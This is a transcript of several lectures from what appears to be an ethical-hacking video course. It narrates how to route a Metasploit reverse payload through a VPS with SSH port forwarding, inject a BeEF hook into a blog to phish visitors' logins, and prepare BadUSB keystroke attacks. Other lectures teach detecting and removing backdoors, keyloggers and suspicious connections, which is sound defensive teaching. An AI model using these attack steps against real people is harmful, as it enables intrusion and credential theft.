let me say clear, exit, clear again. So right now we're going to forward the connection from the VPS to our Linux machine. So to do that, we're going to type SSH minus, or before we do that, I'm going to say I'm going to log into my machine, VPS machine. I'm going to say SSH as we saw before. So root, and then I'm going to add the IP address of my VPS. So let me copy it from my email and paste it here. And I'm going to add the password. So the first thing we're going to be doing is we're going to configure the port forwarding into our VPS. And this is going to be very easy. Just go to your, just type nano, which is the text editor, etc ssh, and then sshd config _config, and then you're going to press enter, and then you're going to scroll all the way down, enter, and I'm going to say get way ports yes. So this will allow us to forward the ports from our VPS to our Linux machine. And then I'm going to say Ctrl O to save it, and Ctrl X to exit. So now I'm going to restart my SSH service by typing etc init.d, and then I'm going to say SSH restart. I'm going to press enter, and now it has been restarted. So now everything is ready, and I'm going to say exit right now, clear. And now we're going to forward the connections from our VPS to our Linux machine, and this is very simple and basic. Just type SSH -r, and then I'm going to say 1234, which is the port that we have used with our payload, colon, and then I'm going to add my local IP address, which is 192.168.0.0.1, and then colon, and 1234 again, and I'm going to say root. I'm going to log in as root, and it's going to be, I'm going to put the IP address of my VPS. So SSH, we're going to log into it using SSH, and -r is for address, or the IP address that I'm going to redirect the connection to, and this is going to be through the port 1234. So from the port 1234 from VPS to our Linux machine on our local host on this port, and we're going to log in as root, and this is the IP address of our VPS machine. So I'm going to say enter, and I'm going to type the password, which is my name, and enter. So now everything is ready. The last step is we are going to set a listener. So I'm going to open new terminal. I'm going to say MSF console to interact with Metasploit through MSF console interface. I'm going to minimize the window. So I'm going to type use exploit multi-handler to listen for the incoming connections, and I'm going to specify the port or my payload, which is reverse HTTPS, and I'm going to say show options. I'm going to set the L port, which is 1234 that we have configured with our payload, and the L host is going to be the same IP address that we have used to redirect the connection to, which is 127.0.0.1, which is our local IP address. So you can put here your local IP address, or you can put your internal IP address, which is let me show it to you. If config, you can put this IP address, the internal IP address, instead of putting your local IP address. Both of them is gonna work, so it's okay. You can put 127.0.0.1 or your internal IP address, so that's gonna be okay. But in our case now we have our local IP address, so I'm gonna say set lhost my local IP address and show option again. So we are listening on the port 1234, and our local IP address is gonna be 127.0.0.1. So now I'm gonna say run, and now everything is ready. So any connection is gonna be forwarded to our Linux machine. So the last step is to send our payload to the target. And I'm gonna show you one thing, that I'm connected to a completely different network. So if I type canyousseeme.org, you will see that this is my IP address, this is my actual IP address. But if I connect back to my Linux machine or to my Windows machine, let me delete the old payload, you will see that I am so I'm gonna say can you see me. You will see that I am in a completely different network. It has a different IP address, and this IP address is from France, and this is my Linux IP address. So it's connected to a completely different network, just to give you an example. So as I said before, we are gonna send the payload to the target. Let's take an example. I'm gonna use a website allows us to do that, so I'm gonna say upload files.io, and then I'm gonna select my file or my payload. Where is it? So I'm gonna give this URL to my target, or you can upload it to your web server. You can do whatever you want. We have talked about many methods to do that. So nlicf so I'm gonna say enter, then I'm gonna download it through the URL. I'm gonna wait 5 seconds, and now let me download it. And here is it, it's ready. I'm gonna minimize the window, and now we will see how we will get a reverse connection to our Linux machine through the VPS. So as you can see right now, we don't have any connection, we don't have any meter session, and now we're gonna run the payload. So more info, run anyway. And now let's come back here. As you can see, we have got one meter session is open, and everything is okay. Now let's interact with them. So I'm gonna say pwd ls. We don't have anything, sysinfo. As you can see, here is the system information, etc. So we learned from this lecture how we can get a reverse connection using a VPS, and this is by redirecting the connection from our VPS server to our Linux machine, and this also will hide our identity, and this will solve the problem that we have faced in the first lecture when we were trying to forward the connection from our router to our Linux machine, because the ISP doesn't allow us to forward any connection, and we have to pay an additional amount to enable our IP version 4. And in the next lecture, I'm going to show you how you can hook any client over the internet and run any module you want. In the previous section, we learned how to deal with Beef project and how to hook any browser with our Beef control panel. And also we've seen how to run the most powerful modules in Beef project. But all of this was in our LAN network. So we didn't see how to hook the browsers over the internet. But in this lecture, I'm going to show you how to configure Beef to hook any browser over the internet. This is done by changing the IP address of Beef. So instead of putting our internal IP address, we're going to put our public IP address. And then we will forward the port 3000 to our Linux machine. And we're ready to go. Or you can simply use a VPS to forward the connection to our Linux machine like we've seen in the previous lecture. Now let's see how to do that. Okay, so the first thing we're going to be doing is we will open Beef project like every time. And then we will copy the JavaScript. and we will inject it into our website or into your web server. Here is my blogger, and we have learned this before. I'm going to theme and then edit HTML, and then I'm going to paste it above the body element. So I'm going to paste it right here, and instead of the IP, I'm going to add the VPS IP address. So let me come back here. Let me check my VPS IP address. Where is it? And I'm going to come back to my blogger and paste the IP address here. So our VPS is going to get the connection, and then we will forward the connection from our VPS to our Kali Linux machine through the port 3000. And then I'm going to say save theme. And now everything almost ready. Here is our beef control panel. We have no online browsers. So the last step is we will forward the connections from our VPS machine to our Kali Linux, and this is by typing SSH minus capital R, and then the default port of B is gonna be 3000, and we will forward it to our Kali Linux machine or the local host of our Kali Linux machine through the port 3000, and then I'm gonna log in as root, and I'm gonna paste the IP address of my VPS. So I'm gonna say enter, and I'm gonna add my password. Now everything is ready. So as you can see, we have no online browsers, and everything is set right here. So save theme again. Let me close this page. Let me say save theme. And now let me close the page, and everything is ready. So let's come back to our target, and it's in a completely different network. As you can see here, it has a different IP address. Let me show you here as well, just to make sure that everything is okay. So it has a different IP address, and now I'm going to my website, and you will see that the target will, or the browser will be hooked with my beef control panel. So let me come back here, and we're gonna wait a little bit. And as you can see here, the hooked browser. So I'm going to click on it and go to commands, and I'm gonna use a certain command or a certain module. So I'm going to social engineering. Let's say I'm gonna use pretty theft. And if you want to run any module, you are going to put your local IP address, which is 127.0.0.1. And as you can see, nothing is in here. I'm going to say execute. I'm going to come back here. And as you can see, I'm going to enter, let's say, sad@gmail.com. And the password is going to be sad1234 and login. Let me come back here and check. And as you can see here, the login credentials. So here is one method to forward the connection from your VPS to your Linux web server or to your Kali Linux machine. And of course, if you are using an IP version 4 or IP version 4 is enabled in your router, you can simply go to your router and create a new rule as we have done before. So I'm going to my router. I'm going to log in first, and then I'm going to forward the connection on port 3000 to my Kali Linux machine, as we saw before. So I'm going to forwarding, and let me delete all the rules right now. I'm going to say added new, and I'm going to add this service port is going to be 3000, which is the port of beef, and my internal IP address is 192.168.0.59, and I'm going to select both of the port or both of the protocols, TCP and UDP, and the status is enabled, and save, and now everything is ready. And you don't have to use a VPS if your IP version 4 is enabled, and the ISP allows you to forward any connection to your machine. So we learned from this lecture how you can hook any client over the internet, and this is by using two methods. The first method is by using a VPS, so you will forward the connection from your VPS to your Kali Linux machine, and then you can run any module you want, or you can simply go to your router and create a new rule and forward the connection on port 3000 to your Kali Linux machine as we see right now. We learned from the previous videos how to fully control any computer that is connected to our Wi-Fi access point. We saw how to encrypt our backdoor and how to deliver it to the target computer smartly. But we didn't learn how to detect the encrypted backdoor. So in this video, you'll learn how to detect any MetaPredator session and kill it on your Windows memory. Even if the backdoor was encrypted, this done by scanning its service works on your Windows machine. So we are going to use a small program that I found on the internet, and it's very useful because it will give you the full path of the detected service and the PID and the name of the service. There is two modes in this small program. The first mode is IDS, and it used to only detect any MetaPredator session, and the second mode is IPS, and it used to detect and end any MetaPredator session. So let's see how we can do that. So here I have Metasploit is running and everything is ready to use. Here is my Kali Linux IP address and the port is 4444, and my web server is enabled, and my encrypted backdoor is on my web server, so I'm ready to download it from the target computer. Actually, I can redirect my target to my backdoor, or as we saw before, we can just create fake update to the target browser and he can download our backdoor. But in this tutorial we are going only to detect and kill any MetaPredator session. So first let me show you the program that I talked about is MetaPredator detection. It's a very useful program. To run it, just go to CMD and run it as administrator. So here's CMD. I'm going to run it as administrator. Yes. Okay, so the file is on my desktop, so I have to go to my desktop in order to run it. CD users, CD, then the name of my computer is iSecurity, then CD desktop, and lastly I'm gonna say dir in order to see the program that I talked about. So here's the program is MetaPredator detection.exe. Just type MetaPredator detection.exe, and as I said before, we have two options. The first option or the first mode is IDS, and it only used to detect any MetaPredator session. So let me say enter, and now it will scan all the services that's running on your Windows machine. And as you can see, zero idle is okay, so everything is okay. There is no any MetaPredator session is open. Let me say Ctrl+C, and now I'll come back to my Kali Linux, and I'm gonna listen for the incoming connection by typing exploit, and now everything is ready. Let me go to my browser here and download my payload. So I'm gonna type the IP address of my Kali Linux, 233 and then 132/payload.exe. I'm gonna say enter, and here is the payload. So right now I'm going to run it. Let me go to my Kali Linux, and as you can see here, I have a MetaPredator session is open. If I type here sysinfo, I'll be able to see the system information. But right now we are going to detect the MetaPredator session from our Windows machine. So we are going to use the same command in order to detect any MetaPredator session. I'm gonna press enter, and as you can see here, it gives me a warning. Says that here is it. Say that we have a payload. It's called payload.exe. MetaPredator process found in memory, and here you have the base address, and so here you have a lot of information. This is what I'm talking about. So right now you only here also it shows you that MetaPredator detection is like a process found in memory, but actually it's not. So your computer it will not be infected against MetaPredator detection. It will only detect any session, as we saw before here. But for now we have this process. So there's two options. You can use the second option to, like, let me type Ctrl+C, And if I use instead of IDS IPS, I'll be able to detect and kill any Metasploit session, and we will see that. Or you can go to Task Manager, then Detail, and you will see the payload here. Here is it, Payload 2. You can end the task from here or from here, so it's not going to be a problem. Then you will go ahead and delete the payload that you have downloaded before. Now let me go to my Kali Linux machine and type sysinfo again, and you can see here it will give me the system information again, because we only detect Metasploit session in the target computer and we didn't kill it, so it's running for now. Let me go to my Windows machine and use the option IPS. Let me say enter. And now everything's okay, and this process has been killed, or the Metasploit session has been killed. If I come back to my Kali Linux machine and type sysinfo, I will not be able to do anything. And as you can see here, the IP address of my target computer or the Metasploit session has been closed. So we learned from this video how to detect and kill any Metasploit session is open on your computer in order to protect yourself. We saw from the previous lectures how to hide our backdoor and combine it with other files such as exe file, image, PDF, etc. But in this lecture, I'm going to show you how to detect the running backdoor on your Windows operating system manually without using any tool. First, we're going to check the properties of the suspicious file, because if the suspicious file was combined with an image, you'll see that in the properties that it's an application and it's not an image. Then we will check the registered startup keys and the startup menu, which is the program that runs every time you boot up your computer. And lastly, we'll check the temporary files. Now let's see how to do that. Okay, so the first thing we're gonna do is you're gonna go to the Task Manager. And from the Task Manager, you will go to Details and you will see all the running processes in the background. So of course, this is gonna be difficult to check every process, but I'm gonna give you a simple trick that will help you to determine whether this process is a payload running on your computer or not. And this is by checking the name of the process and checking the description of the process. So if the name of the process and the description of the process are the same, so probably it's not 100%, but probably that this process is a malicious file, but not all the time. So here we have a process called service.exe, and you will see that the description of this process is .exe, service.exe. And also there is another process called sshd.exe, and also the description is sshd, but you will see here that the username is sshd/server, and if you go to the file location, you will see that it's an open SSH folder, so it's not a payload. So let's come back here to the service.exe. I'm going to check the file location, and you will see that this file or this process is in the temporary file. Another thing you can do is by going to the startup menu from here. You will see a process called service.vbs. It's ended with VBS. So also this is going to be suspicious. But if you double click on it, or not double click, right click on it and go to open file location, you will see that this process runs every time you boot up your computer. So probably this is a persistent payload. And we know that the persistent payload is most of the time in the temporary folder. And one thing you can do also is by going to service.vbs, because it's ended with VBS. That means it's executable and it's my temporary file, and it's start up every time I boot up my computer. And from the details or from the running processes, I can see that the name of this process same as the description of this process, so probably this is a payload. And another thing you can check from it, and by going to right click on it and go to edit, you will see that this is a shell code runs every time you boot up your computer. And another thing you can see here, wscript.sleep. So this code will run every 10,000 milliseconds. So that means every 10 seconds. And here we have a loop variable. So loop will run this shell code every 10,000 milliseconds, which is 10 seconds. And from here we can know that, or we can determine that this file is a payload running in our computer. Every time we boot up our computer, this shell code will be executed on our computer, and it will give a reverse connection to the attacker machine. So now the question is how we can delete this process from our computer, or how we can delete this file. So the first thing I'm gonna do, let me close all the tabs just to make everything is clear. You will press the Windows key and R, and then you will put the percentage symbol, temp, then percentage symbol, and you're gonna press enter. And here you will see this the payload or the malicious file. You're gonna delete it from here, and you are gonna end the task that's running in the background. If we go to the details, we're gonna search for service. Here's it. I'm gonna end this task, and let me delete everything in the temporary file, and now everything is okay. So another thing is, if you go to the task manager another time, you will see that this service is still in our startup menu. So how we can delete it? So you can delete this process from running every time you boot up your computer from the registry keys. So if you press the Windows key and R again, you will type this time regedit. And this is to edit the registry keys in your computer. Let me close everything from here. Okay, so you will see like this. The first thing you're gonna do is you will go to H key current user, and then you will go to software, and after that you will go to Microsoft, and you're gonna search for Windows. You will scroll down and you will search for Windows. After that you will go to current version, and from current version you will search for run. Here is it, and you will see that this is the key. So this is the file that's run every time I boot on my computer. So in the we have deleted the service.vbs from the temporary file, and now we're gonna delete it from the registry, so that it's not gonna run every time I boot up my computer. If I check the startup menu again, you will see that it's gone, and it will not connect back every 10 seconds. Let me go again to the temporary file. You will see that it's empty. Let me go to, there is another temporary file, but instead of putting the percentage symbol, I'm gonna leave it like this, and it's gone. So now our Windows 10 is clean. If I came back to my Kali Linux, you'll see that I'm not going to get a reverse connection. Let me just show you first. Let me type sessions. This is the session that we have deleted from the target operating system, which is our Windows 10. I'm gonna type session and interact with this session, and you will see that it's not gonna work. Let me type pwd. It will keep like this, and it's not gonna give me any result because we have deleted this process from the target or from our Windows 10 machine. As you can see, it's not working. ls, it's also not gonna work. It will keep telling me that this operation is timed out. Okay, so let me put it in the background and clear all the sessions. So this will close all the sessions, and then I'm going to run my listener again and see if it's gonna give me a reverse connection. So show options. Here's it's a reverse HTTPS payload, and I'm gonna say run. Let me exit from here first, and let me type MSF console again. And now I'm gonna set my listener. And now I'm gonna say run. And now let's see the result. So we will not receive any reverse connection from the target machine because we have deleted the process, and it's not gonna generate itself again. So as you can see, we are not getting any reverse connection from the target machine. Even if we reboot the machine, you will see that. So let me come back here, and now as you can see, we are not getting any reverse connection. So on the target machine, let me go to the task manager and check for the service that we have deleted. So startup menu is clean, and let's search for the service. So it's not here anymore. As you can see, it was here above this service.exe, but this one is clean because it's from Microsoft. And as I said, you can go to the file location and determine whether this a malicious file or not. So as you can see, we are not getting any reverse connection from the target machine. Another method is to take the backdoored file with an image or with a PDF file, and this is by checking the properties of the program. You will see here that this file is an image and it ends with the .jpg extension, and it looks like a legit image. But if you go to the properties of this file, you will see that the type of this file is an application.exe, as you can see here. Even if the extension is .jpg, but this doesn't matter. The matter is the type of the file and it's .exe. And everyone knows that .exe is an executable file and it's not an image, because an image comes with the JPG or PNG extension, and it doesn't come with .exe extension. Even if you go to the details here, you will see that the type is an application. And another method to detect this suspicious file, and this is by renaming the file to anything else. So you can rename it to, let's say, for example, test. And now it's .exe and it's not .jpg anymore. So from here, we were able to detect that this suspicious file is a malicious file and it's not an image, because it ends with .exe. But what if this file was compiled with an executable file? So even if you rename it, it will stay .exe, and even if you check the properties of the application, it will still an application.exe, because you were expecting an executable. So let's say that this file was compiled with a WinRAR program, as we've seen in a previous lecture. So I'm gonna show you how to detect that in the next videos. After learning how to detect the running backdoor on your computer, in this lecture I'm gonna show you how to detect the combined backdoor by checking the signature of the file, because each program has its unique signature called MD5. And MD5 is an algorithm that's used to verify data integrity. And any modifying in this program will change its MD5 signature to another one. So to do that, I'm going to use a small program called WinMD5. And WinMD5 is a program that allows the user to calculate MD5 hash or check some for files and verify a download. So after taking the MD5 hash of the suspicious file, we are going to compare it with the original signature. Now let's see how to do that. Okay, so now let's assume that one of my friends has sent me a program or a file, and he told me that this is a very useful program and it's used to extract files or folders. And as I said in the introduction, every program has its unique MD5 signature. And to get its unique MD5 signature, we're going to use a program called WinMD5. You can download this program from the internet, and it's very heavy and portable. And then you are going to download the same program that your friend has sent to you. For example, here we have WinRAR. I'm going to download this program from the internet as well. So here's WinRAR official website. I'm going to download the English version. And now I'm going to come back. So this is the program that my friend has sent to me, and this is the program that I have downloaded from the internet. Both of them are the same. So the idea here is to compare this program hash with this program hash, and if this hashes would match, so that means that this program is clean and you can run it without any issues. So I'm gonna open Win MD5 and I'm gonna get this program MD hash by going to browser, and I'm gonna select it from here, and you will see that this is its hash. So what I'm gonna do right here, I'm gonna open the notepad and copy it and paste it in my notepad. So I'm gonna copy it and paste it here, and I'm gonna type under this is from my friend, and then I'm gonna take or check the MD5 hash of this program that I have downloaded from the internet. Here is it, and you'll see that it has another hash. I'm gonna paste it here. This is the file that I have. So now let's see, I'm gonna compare this hash with the hash of my friend program. I'm gonna put here, it's telling you pass its original MD5 value to verify. Now let's see the result. If it's matched, so that means it's clean. You will see here that it's not matched. So that means that the file or the program that my friend has sent to me is a malicious file, or probably, or 90% he sent me a program that has or this file or this program has been modified by him and migrated with a malicious file that could harm my computer. So you can do that with all the programs on the internet. So if you have downloaded the program and you are not sure whether this is a clean program or not, you can download the same program from the official website and compare its hash with each other. And if the hash was the same, so that means that the file or the program is clean. If it's not, so that means it's modified by the programmer or any hacker could harm your computer. Now I'm going to show you how to encrypt the keystrokes of your keyboard from capturing, because once the attacker hacks your computer, he's going to start by capturing the keystrokes of your keyboard to steal all your personal information and emails, password, etc. So we're going to use a program called the Man Anti-Logger. The Man Anti-Logger is a free program that protects your computer from keyloggers by encrypting your keystrokes. So by encrypting the keystroke, the attacker will not be able to capture anything from your keyboard, and all of your personal information will be protected from keylogging. Now let's see how to do that. Okay, so before we get started, I'm going to show you a quick demonstration of how the hackers can capture the keystrokes. So we learned it from a previous lecture. We saw how the attacker can set or install a keylogger on your machine and run it and save all your keystrokes. Now let's see, before doing everything, before installing the anti-logger program, let's say that let me enable the keylogger first. Let's type keyscan and start. And now I'm gonna come back to the target machine and open my browser, and let's say that I'm going to my Facebook account, and I'm gonna enter my email. Let's say, for example, sad@gmail.com, and my password is 12345678890, and then I'm gonna say login. If I came back to the attacker machine and I type keyscan, now I'll be able to see all the captured keystrokes. So you can see here my name is sad, then right shift to add gmail.com, and the password is 12345678890. So now I'm gonna type keyscan stop to stop the keylogger from capturing the keystrokes, and I'm gonna come back to the target machine, and I'm gonna show you right now how to encrypt your keystrokes. So I'm gonna download a program called Anti-Logger, the Man Anti-Logger. Zamana anti-logger like this, and I'm gonna put all the programs in the description. Here is it. You can download it from the official website. There is a program called Zamana anti-malware and anti-logger. I'm gonna download the anti-logger. It's gonna give you, I think, about 1 week or 2 weeks as a free tutorial. Here's the program. I'm gonna close my browser. And now I'm gonna run the file that I have downloaded. And I'm gonna accept it and install it on my Windows machine. And now it's ready to use. So as I said in the introduction, that this file or this program will encrypt my keyboard from capturing from the hackers or anyone trying to capture my keystrokes. Even if he hacked my computer, he will not be able to capture my keystrokes. So I'll protect my keyboard from capturing my messages, emails, password, or any sensitive text files. So now, as you can see, the license is 15 days remaining, so it's gonna give you 2 weeks, about 2 weeks. And now we're gonna test the program. So I'm gonna come back to the attacker machine and I'm gonna type keyscan start, and I'm gonna see the result right now. I'm gonna come back and open my browser, and then I'm going to facebook.com, and I'm gonna add my email. So I'm gonna say test@gmail.com, and then I'm gonna say the password is test1234, and then I'm gonna say login, and I'm gonna come back to the attacker machine. Let's say keyscan dump, and let's see the result, and you will see that it's not give the attacker any captured keystrokes. So dumping captured keystroke, there is no captured keystrokes, as you can see. I can continue and write anything. For example, I can open the notepad and I can type, just for granted, this is my sensitive files and emails password, just for example. And I'm gonna type again keyscan dump, and you will see that it's not going to be able to capture anything. So we learned from this lecture how you can encrypt your keystrokes from capturing, even if your computer was hacked by a hacker who will not be able to capture your messages, email, password, etc. And this will help you, or this will add a protection layer to your computer beside your antivirus and your knowledge about how you can detect your or how you can detect any running process in the background or any malicious file running in the background. In this video, I'm going to show you how to analyze the connections in your Windows machine. Because if you remember, we learned from a previous lecture how to migrate our backdoor with a trusted running process in the target machine. So the backdoor will be hidden from the running processes, and the only way to detect it is by analyzing the connections. So in this lecture, we will analyze the connection that's going through our computer, and we're going to use a program called cports. Cports is a program network monitoring software that displays the list of all currently open TCP/IP and UDP ports on your local computer. And using this program, you can determine any suspicious connection and try to delete the malware from our computer. Now let's see how to do that. The first thing you are going to do is you are going to download cports program that we talked about in the introduction. And I'm going to put the link of the website in the description. Here's it. I'm going to scroll down and download it from here. Here's the link. You can download it from this link, or if you have a 64 process, you can download this version. So I'm going to come back. In my case, I have already downloaded. Here's the program. I'm going to open it, and I'm going to close Google Chrome first, and Let me refresh it, refresh all the connections. Now I'm going to search only for the established connections. So you can see here that I have only one established connections from this program that's called service.exe, and it's coming back to a IP address 10.02.15 through the port 8080. So what I'm going to do here is I'm going to copy this IP address. I'm going to double click on it and copy the IP address from here. Then I'm going to my browser. And I'm going to go to a website called IP Lookup. Here's it, and I'm going to link it in the description. So I'm going to take the IP that I have copied and paste it here. And you can see here that I have no result because actually this is a local IP, but normally you will see a public IP in this established connection if your computer was hacked. So let's say, for example, let's take an example from here that here we have one service that's timed out, but I'm gonna give you just only an example. It's coming from this IP address through the protocol HTTPS, and it's used this port 443, which is the HTTPS port, to our computer, and it's a TCP protocol. So what I'm gonna do here, right here, I'm gonna copy the IP address and go to the same website and search for this IP address and see the for which company this IP address belongs. So let me copy the IP address. I can see here that I cannot copy it. Let me try again. And now I'm gonna search for it. So you can see here that the owner of this IP address is google.com, and everyone knows google.com, so this IP is not suspicious. But if you see an IP address that's coming back to a country and it doesn't have any information, so that's mean that this IP address is for a person, and probably this service is a malicious file, so you have to end it from your background and delete the service from your computer. So in my case, I have only one established connection. In your case, you could see more than one connection, or 3 or 4, or maybe more than 10 connection, but you have to make sure that you have to close your browser and all the programs and run only cports program to determine which process is the malicious file. There is another method that you can do without using programs, and this is by using cmd command prompt. So you can go to cmd, and then you're going to type netstat -n, and it's going to show you all the connections. But first, let me close the browser, because as I told you, this will help me to determine all the connection. And you're not going to search for timed out. You are going to only search for established, which we have only one service. You can do netstat space -n like this, and you're gonna type find and type here established, and it's gonna only show you the established connection. And you can see here that you have only one TCP connection that's coming through port 8080 from this IP address 10.02.15. And as I told you before, you have to check this IP in the website that I talked about, and check from which website or from which company that this IP belongs to. And if this company was verified, so that means that this service or this process is a clean process and you don't have to end it and delete it from your computer. If it's not, and if the process was from unknown company or unknown place, so you can delete it and end it from your computer in order to clean your computer from the malicious files. In this lecture, I'm going to show you how to analyze the running processes in the background of your Windows operating system. So to do that, we're going to use a program called Hijack This. Hijack This is a program used to detect malware and adware on Microsoft Windows. So first, it will scan all the running processes, and after that, it will give you a full report of the scanned processes. Now let's see how to do that. Okay, so the first thing you're going to do is you're going to download Hijack This from the internet, and I'm going to put all the links in the description. After downloading Hijack This program, I'm going to run it, and you're going to get this interface, and you're going to do a system scan and save a log file. So now it's going to scan your computer from the running processes and the registry keys, and it's going to give you a full report of the scanned registry keys and the running processes. So what you're going to do right now is you're going to copy this result and paste it in the official website of Hijack This program in order to analyze it. So first, and you will realize that a new log file has been generated on your desktop, which is this .exe file. So I'm going to copy all of the content of the result file or the result. Then I'm going to come back to the official website of Hijack This, and it's called hijackthis.ee, and I'm going to put the link in the description. So right now I'm going to paste the result that I have just copied, and I'm going to say analyze in order to get the full report of the running processes and the registry keys. So you will see that it's very fast and simple, and you will see that you have a check mark, an X mark, and you have a question mark. So I'm going to only check, or I'm going to only see the X mark, and I'm going to read the report of it. So here we have Internet Explorer, the version 11, and the information here is the version is out of date, so you have to update it because it could be vulnerable. And another process called service.exe, it's running in my Windows machine, and you will see this is a nasty process you should fix and try to delete it manually. So that means that this process is it could be, and it probably is a malicious file running on my computer, and I have to end it in from my task manager, and then I'm gonna delete it from this path. So first, let me show you that I can control this computer from here. So if I type the pwd and ls, you will see that I can control this computer from my Linux machine, and we saw all of that and in the previous lectures. So again, I'm going to come back to my Kali machine, or to my Windows machine, and I'm going to the task manager, then to details, and I'm going to search for the service.exe. So I'm going to scroll down a little bit, and I'm going to see the service here. Here's it. I'm going to end it, and then I'm going to this path, which is in downloads. So you can see it right here. Here's it. I'm going to delete it from here, and now my computer is clean. So let me come back to the attacker machine and see if I can control the Windows machine, and you will see that it's timed out and I'm not going to be able to execute commands on the target machine. As you can see, it's timed out. So we learned from this lecture how you can analyze your computer from the running processes, and even if the payload or even if the malicious file was encrypted, and if it was undetectable against the antiviruses, you will be able to detect it using this program that will help you to scan all the registry keys and the running processes on your computer. So far we've seen how to detect the backdoor by analyzing our computer and by checking the MD5 hash and by analyzing the connections. But in this video I'm gonna show you another way to detect the backdoor, and it's by using a sandbox. Sandbox is a testing environment where your file will be executed and it will analyze it and give you a full report of it. So it will try to check if the file will does anything suspicious, or it will open any port, or it will try to connect back to a certain IP address. And we are going to use a website that allows us to do that. And before you run this suspicious file, go and upload it to this website that I'm gonna explain it in this lecture and read the full report. Now let's see how to do that. Okay, so let's say that this is a suspicious file and I'm not sure whether this file is clean or not. It could have a malicious file or not, and to check that we're gonna use a website called hyper-analysis.com. And as I said in the introduction, that this website will execute my suspicious file in a safe environment, and it's not going to be executed on my computer. And then it's going to give me a full report. And I prefer using a virtual box or a virtual machine before doing that, because it's going to be like an additional security layer for you. And yeah, so I'm going to select the file, the suspicious file. It's in my downloads folder. Here's it, and then I'm going to type the captcha code. Then I'm going to scroll down and check this box, and then I'm going to say generate public report. In my case, I have already generated before, so it's not going to take time for me. In your case, it could take about 5 or 10 minutes. And so you'll see here it's telling me that it's a malicious file, and you will see that malicious indicators. There's two malicious indicators, but these malicious indicators are hidden because I'm not using the full version. But you can use the limited version. It's going to be enough for you. Just you can read the report and you can determine whether this file is a malicious file or not. So you will see it will be able to read the active computer. It's going to be able to get the computer name and the machine UID, which is the system information, and it's going to be able to monitor and change this registry keys. Here is it. And let me scroll down more. The most important part is here. So the file name is service.exe with this size, and the architecture is 32-bit. I'm going to scroll down more, and you will see the original file name was payload2.exe, so this could help you a little bit. And if you scroll down more, you will see that it's going to give a reverse connection to this IP address through the port 8080, and the payload is going to be 3916, and it's called service.exe. So what you're going to do here is you're going to copy this IP address, and we're going to do as we did before when we reverse the IP address. So I'm going to type IP lookup. Here is the website, and I'm going to scroll down and search for this IP. And but one thing I want to mention, that this IP is a local IP and it's not a public IP, so it's not going to give me a result. But for you, we are going to check whether this IP address is related with any company or not, or if it's related to a trusted company or not. If it's not, so probably 90% this is the attacker IP address. So I'm going to say look up IP. It's not going to give me the result because it's a local IP address. But in your case, as I said before, it has to be a public IP address, and you should check whether this IP address belongs to any company or not. If it's not, so this could be the attacker IP address. In this section, we're going to be moving to learn how you can gain the full access over any Windows operating system just by plugging a USB stick. But before we get into details, I would like to show you a demonstration of what's going to be happen once we plug the USB stick with our Windows operating system. Okay, so the USB stick looks like this, and it has a chip mounted on the USB stick itself, and it's used to store the command that we are going to be executing on the target operating system. And also it has a micro USB port to connect it to the target machine or to your computer. And to connect it to your computer, all you have to do is to use any micro USB cable, and as you can see here, I have used Nokia micro USB cable that usually comes with pretty much any Android phone. Or you can use a micro USB to USB adapter to connect it directly to your computer, and I highly recommend using an adapter because this is going to be easier and faster for you to plug it with your computer. Once you plug in the USB stick, you will see yellow and red LED flash for several times, and that means that the USB stick has been connected successfully. And as you can see, the command has been executed successfully. So here we can see one interpreter session is open, and I'm going to type sessions to see all the available sessions. And then I will interact with session number 1 by typing sessions-i and the number of the session. Okay, so now I am in Metasploit command line and I can type anything to interact with the target operating system. So let's type sysinfo. And here is my system information. Or we can type ls to list all the files and folders. And you can see this is the backdoor that I have used it to get Metasploit session. And if I type pwd, you will see my current working directory. So this was a demonstration of what we will learn in this section, and I'm going to show you more things that we can do it with this USB stick. In the previous video, we saw a demonstration of how we can gain the full access over any Windows operating system just by plugging a USB stick. So in this video, I'm going to explain what has been happened. So let's start with the USB stick. The USB stick that I have used it is programmable. That means you can program it to do whatever you want. For example, you can program it to change the wallpaper or create files or folders and much more. And the used programming language is C or C++. But you don't have to worry about that because I will show you a script will convert a certain command to C programming language. But the question is how it works automatically once I plug it in. Here I'm going to tell you that the USB stick will pretend to be a keyboard, and these kind of USBs known as bad USBs. And this is because it will be able to bypass any kind of antivirus, and it's going to execute the commands as you are typing on your keyboard. And to program the USB stick, we are going to use software called Arduino, and we're going to be talking about all of this in the next lectures. And you don't have to worry about anything because I will explain everything in very easy way. And in the next lecture, I will show you the requirement to perform this attack. And if you have any question about this section, don't hesitate to post your question in the Q&A section or send me a direct message. I will be glad to respond. In the previous video, we learned what is the bad USB and how it works. So in this video, I would like to show you the requirement that we need in order to perform this attack. So first we need to buy the bad USB, and it's very cheap. I bought mine for $5 and there is many different prices. There is some bad USBs cost about $50 and some of them cost $10, $12. That depends on the quality of the bad USB. And I'm going to show you all of this in this lecture. And to program this bad USB, we are going to use the popular Arduino software, and from there we can program the bad USB to do whatever we want. And also we need the script that will convert all the needed commands to C programming language. And to do that, we are going to use a website that has the script called Arduino. So the script is called Arduino. And now let's see from where we can buy the bad USB and the types of the bad USBs and the quality and the prices and the script and all of this in this lecture. Okay, so here's my browser and I have eBay, and I'm gonna search for the bad USB or the chip I'm gonna use it. So let's start first with the bad USB. If I type bad USB in eBay search bar, I'm gonna find many USBs. So you can see here you can use a micro SD with it, and here you can use the USB stick itself. So it's very legit. It's not looking like a bad USB or the one that I've used it in my demonstration video. But actually I haven't tried any of these. I have only tried the one that I've used it, that's called Arduino Leonardo, and I'm gonna show it to you. So here we can look to the prices 7, 8, 14, 8, etc. And if we search for the chip that I've used it, it's called Arduino Leonardo. Here's it. And you can see that there is many different prices. This one costs about $5, $5.80. You cannot use this one, but you have only to use this one and this one that I've used it in my demonstration video. So as you can see, $5, all of them cost about $5, and you can buy it from eBay or Amazon. So if you search here for the bad USB, you can see that there is many different prices. There is the bad USB that we saw it in eBay. Here's it, and it's currently unavailable. So I recommend using the one that I've used it, which is Arduino Arduino Leonardo. So here is it. It costs $870, so it's better for you to buy it from eBay because it's cheaper. And also we have this script. So after buying this chip, we're gonna move to the next lecture that's gonna explain everything. So after that, we're gonna be using this script that will convert all the bad USB commands to Arduino language or C programming language. And after that, we're gonna be learning these commands. So if we typed here, let me open my Google Chrome browser. Let's say USB rubber ducky commands. You have to learn all of these, not all of these, just the things that you want from it. It's simple USB rubber ducky commands that will be converted to Arduino programming language. For some reason it doesn't load. Okay, so you can see here that it's showing you everything, the description, what's gonna do with the commands. So you have the delay command. We're gonna be using this a lot, and we have the string is very important as well, and the Windows or the Windows key or the GUI menu and shift. These are very important commands that we're gonna be using in 